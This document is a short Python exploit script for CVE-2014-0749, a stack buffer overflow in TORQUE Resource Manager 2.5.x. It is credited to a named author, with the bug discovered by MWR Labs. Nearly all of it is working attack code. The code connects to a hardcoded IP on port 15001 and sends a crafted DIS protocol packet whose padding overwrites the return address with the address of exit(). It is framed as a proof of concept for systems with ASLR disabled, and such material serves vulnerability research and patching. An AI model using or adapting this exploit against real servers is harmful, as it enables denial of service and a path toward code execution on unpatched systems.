#!/usr/bin/env python # Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub # Date: 27 May 2014 # Exploit Author: bwall - @botnet_hunter # Vulnerability discovered by: MWR Labs # CVE: CVE-2014-0749 # Vendor Homepage: http://www.adaptivecomputing.com/ # Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/ # Version: 2.5.13 # Tested on: Manjaro x64 # Description: # A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that # a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the # data, the next digits are the actual size of the buffer. # # This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system # with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be # compiled on the target system. The result of this exploit is intended to just point RIP at 'exit()' import socket ip = "172.16.246.177" port = 15001 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) offset = 143 header = str(len(str(offset))) + str(offset) + '1' packet = header packet += "\x00" * (140 - len(packet)) packet += ('\xc0\x18\x76\xf7\xff\x7f\x00\x00') # exit() may require a different offset in your build s.sendall(packet) data = s.recv(1024) s.close()